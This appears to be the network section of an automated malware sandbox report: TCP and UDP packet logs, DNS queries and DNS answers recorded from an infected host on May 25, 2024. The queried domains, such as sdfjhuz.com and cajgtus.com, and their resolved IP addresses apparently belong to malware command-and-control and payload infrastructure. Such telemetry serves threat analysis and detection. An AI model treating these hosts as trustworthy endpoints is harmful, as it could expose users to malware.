May 25, 2024 21:30:24.702208996 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:24.702244997 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:24.855284929 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.855489969 CEST	49803	443	192.168.2.4	104.196.109.209
May 25, 2024 21:30:24.857026100 CEST	49803	443	192.168.2.4	104.196.109.209
May 25, 2024 21:30:24.857055902 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.857551098 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.858246088 CEST	49803	443	192.168.2.4	104.196.109.209
May 25, 2024 21:30:24.898525000 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.973859072 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.974081993 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.974246979 CEST	49803	443	192.168.2.4	104.196.109.209
May 25, 2024 21:30:24.974824905 CEST	49803	443	192.168.2.4	104.196.109.209
May 25, 2024 21:30:24.974864960 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.974937916 CEST	49803	443	192.168.2.4	104.196.109.209
May 25, 2024 21:30:24.974952936 CEST	443	49803	104.196.109.209	192.168.2.4
May 25, 2024 21:30:24.979255915 CEST	49805	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:25.030901909 CEST	80	49805	158.160.165.129	192.168.2.4
May 25, 2024 21:30:25.031076908 CEST	49805	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:25.031122923 CEST	49805	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:25.031122923 CEST	49805	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:25.086083889 CEST	80	49805	158.160.165.129	192.168.2.4
May 25, 2024 21:30:25.136501074 CEST	80	49805	158.160.165.129	192.168.2.4
May 25, 2024 21:30:25.387742043 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:25.387815952 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:25.388258934 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:25.388281107 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:25.388439894 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:25.388457060 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:25.388525963 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:25.388535023 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:25.770488977 CEST	80	49805	158.160.165.129	192.168.2.4
May 25, 2024 21:30:25.771505117 CEST	49805	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:25.775631905 CEST	80	49805	158.160.165.129	192.168.2.4
May 25, 2024 21:30:25.775723934 CEST	49805	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:25.777961969 CEST	49806	80	192.168.2.4	193.233.132.167
May 25, 2024 21:30:25.782408953 CEST	80	49805	158.160.165.129	192.168.2.4
May 25, 2024 21:30:25.792383909 CEST	80	49806	193.233.132.167	192.168.2.4
May 25, 2024 21:30:25.792484045 CEST	49806	80	192.168.2.4	193.233.132.167
May 25, 2024 21:30:25.792712927 CEST	49806	80	192.168.2.4	193.233.132.167
May 25, 2024 21:30:25.846281052 CEST	80	49806	193.233.132.167	192.168.2.4
May 25, 2024 21:30:26.299262047 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:26.299365044 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:26.299431086 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:26.299468994 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:26.299535036 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:26.301074028 CEST	49804	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:26.301105976 CEST	443	49804	65.109.242.59	192.168.2.4
May 25, 2024 21:30:26.307044029 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:26.307087898 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:26.307403088 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:26.307723045 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:26.307745934 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.037144899 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.037276030 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.037635088 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.037661076 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.037801981 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.037813902 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.822223902 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.822282076 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.822422981 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.822499990 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.822500944 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.822500944 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.822729111 CEST	49807	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.822767019 CEST	443	49807	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.829283953 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.829313040 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:27.829389095 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.829693079 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:27.829706907 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:28.632637024 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:28.632772923 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:28.633306980 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:28.633318901 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:28.633487940 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:28.633493900 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:29.428224087 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:29.428392887 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:29.428452015 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:29.428518057 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:29.428949118 CEST	49808	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:29.428972006 CEST	443	49808	65.109.242.59	192.168.2.4
May 25, 2024 21:30:29.483241081 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:29.483266115 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:29.483357906 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:29.483608961 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:29.483623028 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:30.220388889 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:30.220483065 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:30.223545074 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:30.223552942 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:30.223918915 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:30.223925114 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:30.859816074 CEST	49806	80	192.168.2.4	193.233.132.167
May 25, 2024 21:30:30.867741108 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:30.913899899 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:30.914057016 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:30.914263964 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:30.914316893 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:30.977149010 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:31.023569107 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:31.024069071 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:31.024240971 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:31.024349928 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:31.024349928 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:31.025628090 CEST	49809	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:31.025640011 CEST	443	49809	65.109.242.59	192.168.2.4
May 25, 2024 21:30:31.609360933 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:31.609392881 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:31.609477043 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:31.609874964 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:31.609891891 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:31.639491081 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:31.639945030 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:31.649842978 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:31.650046110 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:31.655253887 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:31.655425072 CEST	49810	80	192.168.2.4	158.160.165.129
May 25, 2024 21:30:31.660391092 CEST	80	49810	158.160.165.129	192.168.2.4
May 25, 2024 21:30:31.661343098 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:31.661387920 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:31.661480904 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:31.661847115 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:31.661865950 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.225346088 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.225431919 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:32.227626085 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:32.227647066 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.228055000 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.229093075 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:32.270586014 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.329755068 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.329957962 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.336513996 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.336523056 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.343943119 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.343947887 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.368645906 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.368666887 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.368727922 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.368733883 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.376085997 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.376099110 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.376152992 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.376178026 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.376271963 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.376307011 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.376342058 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.376353979 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.376441002 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.376454115 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.376481056 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:32.376488924 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:32.402286053 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.402472973 CEST	443	49812	162.159.134.233	192.168.2.4
May 25, 2024 21:30:32.402555943 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:33.779167891 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:33.779275894 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.779289007 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:33.779342890 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:33.779367924 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.779403925 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.870531082 CEST	49811	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.870556116 CEST	443	49811	65.109.242.59	192.168.2.4
May 25, 2024 21:30:33.992095947 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.992124081 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:33.992197990 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.992813110 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:33.992821932 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:34.705179930 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:34.705543995 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:34.705954075 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:34.705961943 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:34.706209898 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:34.706213951 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:35.454528093 CEST	49812	443	192.168.2.4	162.159.134.233
May 25, 2024 21:30:35.500391006 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:35.500467062 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.500480890 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:35.500493050 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:35.500535965 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.500556946 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.511106014 CEST	49813	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.511120081 CEST	443	49813	65.109.242.59	192.168.2.4
May 25, 2024 21:30:35.561739922 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.561764002 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:35.561855078 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.565723896 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:35.565735102 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:36.288960934 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:36.289031982 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:36.295886040 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:36.295892000 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:36.296176910 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:36.296180964 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:37.081563950 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:37.081648111 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:37.081650019 CEST	443	49814	65.109.242.59	192.168.2.4
May 25, 2024 21:30:37.081707001 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:37.082110882 CEST	49814	443	192.168.2.4	65.109.242.59
May 25, 2024 21:30:37.082123995 CEST	443	49814	65.109.242.59	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 25, 2024 21:29:22.875734091 CEST	64226	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:23.035521984 CEST	53	64226	1.1.1.1	192.168.2.4
May 25, 2024 21:29:29.669576883 CEST	61128	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:32.215954065 CEST	61128	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:33.203666925 CEST	61128	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:33.333955050 CEST	53	61128	1.1.1.1	192.168.2.4
May 25, 2024 21:29:33.341592073 CEST	53	61128	1.1.1.1	192.168.2.4
May 25, 2024 21:29:33.341608047 CEST	53	61128	1.1.1.1	192.168.2.4
May 25, 2024 21:29:36.966381073 CEST	60770	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:36.978903055 CEST	53	60770	1.1.1.1	192.168.2.4
May 25, 2024 21:29:41.202361107 CEST	51895	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:41.990947962 CEST	57668	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:42.187760115 CEST	51895	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:42.415780067 CEST	53	57668	1.1.1.1	192.168.2.4
May 25, 2024 21:29:43.203499079 CEST	51895	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:43.437458992 CEST	53	51895	1.1.1.1	192.168.2.4
May 25, 2024 21:29:43.444406986 CEST	53	51895	1.1.1.1	192.168.2.4
May 25, 2024 21:29:43.444437981 CEST	53	51895	1.1.1.1	192.168.2.4
May 25, 2024 21:29:45.130472898 CEST	59300	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:45.203561068 CEST	53	59300	1.1.1.1	192.168.2.4
May 25, 2024 21:29:52.468744993 CEST	65278	53	192.168.2.4	1.1.1.1
May 25, 2024 21:29:52.816270113 CEST	53	65278	1.1.1.1	192.168.2.4
May 25, 2024 21:30:24.181798935 CEST	52485	53	192.168.2.4	1.1.1.1
May 25, 2024 21:30:24.203641891 CEST	53	52485	1.1.1.1	192.168.2.4
May 25, 2024 21:30:31.643358946 CEST	52006	53	192.168.2.4	1.1.1.1
May 25, 2024 21:30:31.660413027 CEST	53	52006	1.1.1.1	192.168.2.4
May 25, 2024 21:30:43.046724081 CEST	61524	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 25, 2024 21:29:22.875734091 CEST	192.168.2.4	1.1.1.1	0x53cf	Standard query (0)	trad-einmyus.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:29.669576883 CEST	192.168.2.4	1.1.1.1	0xc8d9	Standard query (0)	sdfjhuz.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:32.215954065 CEST	192.168.2.4	1.1.1.1	0xc8d9	Standard query (0)	sdfjhuz.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.203666925 CEST	192.168.2.4	1.1.1.1	0xc8d9	Standard query (0)	sdfjhuz.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:36.966381073 CEST	192.168.2.4	1.1.1.1	0x881	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:41.202361107 CEST	192.168.2.4	1.1.1.1	0xab9a	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:41.990947962 CEST	192.168.2.4	1.1.1.1	0x210a	Standard query (0)	www.safeautomationbd.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:42.187760115 CEST	192.168.2.4	1.1.1.1	0xab9a	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.203499079 CEST	192.168.2.4	1.1.1.1	0xab9a	Standard query (0)	cajgtus.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:45.130472898 CEST	192.168.2.4	1.1.1.1	0xaa3b	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:52.468744993 CEST	192.168.2.4	1.1.1.1	0xf412	Standard query (0)	nessotechbd.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:24.181798935 CEST	192.168.2.4	1.1.1.1	0xf696	Standard query (0)	transfer.adttemp.com.br	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:31.643358946 CEST	192.168.2.4	1.1.1.1	0x7027	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)	false
May 25, 2024 21:30:43.046724081 CEST	192.168.2.4	1.1.1.1	0xc391	Standard query (0)	api.msn.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 25, 2024 21:29:23.035521984 CEST	1.1.1.1	192.168.2.4	0x53cf	No error (0)	trad-einmyus.com		158.160.165.129	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.163.126.89	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		181.204.98.226	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		190.53.170.126	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		186.4.194.68	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.164.95.127	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		190.12.87.61	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		148.230.249.9	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		31.192.250.185	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.163.91.64	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.333955050 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.178.135.84	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.163.126.89	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		181.204.98.226	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		190.53.170.126	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		186.4.194.68	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.164.95.127	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		190.12.87.61	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		148.230.249.9	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		31.192.250.185	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.163.91.64	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341592073 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.178.135.84	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.163.126.89	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		181.204.98.226	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		190.53.170.126	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		186.4.194.68	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.164.95.127	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		190.12.87.61	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		148.230.249.9	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		31.192.250.185	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.163.91.64	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:33.341608047 CEST	1.1.1.1	192.168.2.4	0xc8d9	No error (0)	sdfjhuz.com		189.178.135.84	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:36.978903055 CEST	1.1.1.1	192.168.2.4	0x881	No error (0)	api.2ip.ua		188.114.96.3	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:36.978903055 CEST	1.1.1.1	192.168.2.4	0x881	No error (0)	api.2ip.ua		188.114.97.3	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:42.415780067 CEST	1.1.1.1	192.168.2.4	0x210a	No error (0)	www.safeautomationbd.com	safeautomationbd.com		CNAME (Canonical name)	IN (0x0001)	false
May 25, 2024 21:29:42.415780067 CEST	1.1.1.1	192.168.2.4	0x210a	No error (0)	safeautomationbd.com		103.174.152.66	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		213.172.74.157	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		148.230.249.9	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		201.119.118.19	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		200.114.83.251	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		58.151.148.90	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		211.168.53.110	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		200.122.37.247	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		181.129.118.140	A (IP address)	IN (0x0001)	false
May 25, 2024 21:29:43.437458992 CEST	1.1.1.1	192.168.2.4	0xab9a	No error (0)	cajgtus.com		201.113.204.230	A (IP address)	IN (0x0001)	false
